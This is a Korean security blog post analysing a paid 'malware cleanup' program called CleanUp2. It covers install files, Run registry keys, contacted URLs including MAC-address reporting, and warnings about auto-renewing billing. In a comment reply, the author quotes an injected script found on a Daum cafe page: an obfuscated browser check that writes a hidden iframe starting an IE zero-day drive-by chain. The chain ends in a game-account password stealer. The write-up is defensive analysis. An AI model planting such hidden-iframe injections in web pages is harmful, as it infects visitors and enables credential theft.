본문 바로가기

벌새::Analysis

악성코드 치료 프로그램 : 클린업(Clean-UP) - CleanUp2

반응형
국내 웹서포트 업체에서 서비스하는 유료 악성코드 치료 프로그램 클린업(Clean-UP) - CleanUp2 제품에 대해 살펴보도록 하겠습니다.

해당 프로그램은 이전에 살펴본 클린업(Clean-UP) 프로그램의 변형된 버전으로 참고하시기 바랍니다.


[테스트 환경]

● OS : Windows XP SP3
● 설치 프로그램 : Setup 설치 파일 (MD5 : 7028239d3daf6e3dc50af0c5b5180971)

※ 해당 프로그램은 배포 방식에 따라 파일 구성 및 정보가 다를 수 있습니다.
※ 해당 내용은 게시글 작성 일자 기준이므로 실제와 다를 수 있습니다.
※ 해당 내용은 컴퓨터 환경에 따라 결과가 다를 수 있습니다.


1. 프로그램 설치 / 삭제 정보


1-1. 생성 폴더 / 파일 정보

해당 프로그램은 [CleanUp2] 폴더에 프로그램을 설치하고 있으며, Windows 시작시 CleanUp2Up.exe / launcher.exe 2개의 파일을 시작 프로그램으로 등록하여 악성코드 검사를 하도록 구성되어 있습니다.

1-2. 레지스트리 생성 정보

[생성 레지스트리 등록 정보]

HKEY_CURRENT_USER\Software\CleanUp2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 - CleanUp2 = "C:\Program Files\CleanUp2\launcher.exe" "C:\Program Files\CleanUp2\CleanUp2Up.exe" /disk
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CleanUp2

1-3. 프로세스 정보


실행된 프로그램은 CleanUp2.exe 프로세스를 생성하는 것을 확인할 수 있습니다.


1-4. 관련 URL 정보

h**p://211.33.123.40/cleanup/install.php?mac=(사용자 Mac Address)&partner=default&ver=
h**p://www.clean-up.kr/app/firstinterval.php
h**p://www.clean-up.kr/app/update2.php
h**p://www.clean-up.kr/app/supdate2.php
h**p://www.clean-up.kr/app/badinfo.php?Vn=2005010100&Kind=comp
h**p://www.clean-up.kr/app/badinfo.php?Vn=2005010101&Kind=file
h**p://www.clean-up.kr/app/badlist/2010032601_badfile.dat
h**p://www.clean-up.kr/app/badinfo.php?Vn=2005010101&Kind=site
h**p://www.clean-up.kr/app/badlist/2007032100_badsite.dat
h**p://211.33.123.40/cleanup/uninstall.php?mac=(사용자 Mac Address)&partner=default&ver=

1-5. 삭제 정보

프로그램 삭제는 제어판의 [클린업] 삭제 항목을 이용하여 삭제하실 수 있습니다.

2. 제품 해지 신청 정보

해당 프로그램의 이용약관에서는 월정액(자동 연장 결제) 유료 사용자는 별도의 해지 신청이 없을 경우 (또는 5년 동안) 매월 자동으로 이용요금을 청구하는 방식이므로 주의하시기 바랍니다.


1. 전화 : 0505-281-9811
2. 자동 연장 결제 해지 신청

위와 같은 방법으로 해지 신청이 되지 않을 시에는 휴대폰/ARS 결제중재센터를 통하여 문제를 해결하시기 바라며, 금전적 피해와 관련해서는 한국소비자원에 신고하여 구제를 받으시기 바랍니다. 기타 프로그램 삭제와 관련된 상담은 보호나라(전화 118번)안철수연구소 가짜 백신 신고센터(로그인 필요) 또는 국내 신뢰할 수 있는 보안 업체를 이용하시기 바랍니다.



728x90
반응형
  • 비밀댓글입니다

    • 안녕하세요.

      해당 카페에 접속을 하니 외부 연결로 인해 현재 IE 6/7 제로데이 취약점을 이용한 악성코드가 확인이 됩니다.

      <script>
      if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73"+"\x69"+"\x65\x20\x37";)==-1)
      {
      document.write("<iframe width=20 height=1 src=jf.htm></iframe>";);
      }
      </script>

      이 소스로 인한 문제로 보이네요.

      말씀처럼 cache.career -> cpp.htm -> jf.htm -> c.exe 이렇게 연결이 되면서 감염이 예상됩니다.

      아마 직업 소개 관련 사이트의 문제로 Daum 카페에 영향을 주는 것 같습니다.

      내일 새벽에 보안 패치가 나온다니 그나마 다행인 것 같습니다.

      최종적으로 다운로드된 파일은 Trojan.Win32.PWSMagania.53760 진단명이군요.

      아마 온라인 게임 계정 탈취용 같습니다.